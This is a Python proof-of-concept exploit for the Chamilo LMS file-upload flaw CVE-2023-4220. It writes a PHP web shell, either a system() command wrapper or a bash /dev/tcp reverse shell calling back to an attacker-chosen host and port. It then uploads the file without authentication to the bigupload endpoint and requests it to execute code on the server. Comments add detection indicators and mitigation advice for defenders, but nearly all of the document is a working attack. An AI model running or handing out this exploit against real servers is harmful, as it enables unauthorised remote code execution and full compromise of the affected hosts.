import argparse
import requests
import os
# ANSI escape sequences used to colour the status lines printed below.
RED = '\033[0;31m'
GREEN = '\033[0;32m'
YELLOW = '\033[0;33m'
RESET = '\033[0m'
# Name of the PHP file written to the current working directory and then
# uploaded. The script leaves this file on disk after it finishes (nothing
# below removes it), which matters for anyone triaging a host that ran it.
rev_shell_filename: str = "shell.php"
# Parse command-line options. This is a flat script: argparse runs at import
# time, so importing the module from elsewhere will parse sys.argv and may
# exit. '-c' and the '-lhost'/'-lport' pair are alternatives, but argparse
# is not told that; only '--url' is enforced as required.
parser = argparse.ArgumentParser(description='POC for Chamilo LMS CVE-2023-4220')
parser.add_argument('-u', '--url', required=True, help='Website where you want to upload the payload: http://host:port')
parser.add_argument('-c', '--command', help='Command to execute on server')
parser.add_argument('-lhost', '--localIP', help='Local IP for reverse shell')
parser.add_argument('-lport', '--localPort', help='Local port for reverse shell')
args = parser.parse_args()
host_url = args.url
command_to_execute = args.command
local_ip = args.localIP
local_port = args.localPort
# Write the PHP payload to disk before uploading it. With '-c' the file is a
# one-line system() wrapper around the given command; otherwise it is a
# bash /dev/tcp reverse-shell one-liner pointed at lhost/lport. Either way
# the values are interpolated into the PHP source verbatim.
with open(rev_shell_filename, "w", encoding='utf-8') as file:
    if command_to_execute:
        shell_content = f'<?php system("{command_to_execute}"); ?>'
    else:
        shell_content = f'<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1\'"); ?>'
    file.write(shell_content)
# Upload the PHP file as the multipart field 'bigUploadFile' to the bigupload
# helper endpoint with action=post-unsupported. No session cookie or other
# credential is sent with this request, and the server is expected to store
# the file under the 'files/' directory used by the GET below.
#
# Defender notes (CVE-2023-4220):
#  - In web-server logs this looks like an unauthenticated POST to
#    /main/inc/lib/javascript/bigupload/inc/bigUpload.php with
#    action=post-unsupported, followed by a GET of a .php file under
#    /main/inc/lib/javascript/bigupload/files/. Both are worth alerting on.
#  - New .php files appearing under that files/ directory are a strong
#    indicator of compromise; treat the host as compromised, not just the app.
#  - Mitigation is the vendor fix for CVE-2023-4220 (see the Chamilo
#    advisory); as an interim measure, block or remove the bigupload
#    endpoint at the web server.
try:
    with open(rev_shell_filename, 'rb') as file:
        files = {'bigUploadFile': file}
        upload_url = f"{host_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
        response = requests.post(upload_url, files=files)
        # Only HTTP-level failures (4xx/5xx, connection errors) are caught;
        # a 200 that silently rejected the file is reported as success.
        response.raise_for_status()
        print(f"{GREEN}File {rev_shell_filename} uploaded successfully.{RESET}")
except requests.exceptions.RequestException as e:
    print(f"{RED}File upload failed: {e}{RESET}")
    # NOTE: this is the site-module builtin exit(), not sys.exit(); it
    # behaves the same from a script but is not guaranteed under every
    # interpreter configuration.
    exit(1)
# In reverse-shell mode the operator is expected to already have a listener
# on lhost:lport; the GET below is what causes the uploaded PHP to run.
if not command_to_execute:
    print(f"{YELLOW}You will get the shell, you can stop this script now.{RESET}")
# Request the uploaded file from the public files/ directory, which executes
# it server-side. The status of this response is not checked; its body is
# only printed in command mode.
result_url = f"{host_url}/main/inc/lib/javascript/bigupload/files/{rev_shell_filename}"
response = requests.get(result_url)
if command_to_execute:
    print(f"{GREEN}{response.text}{RESET}")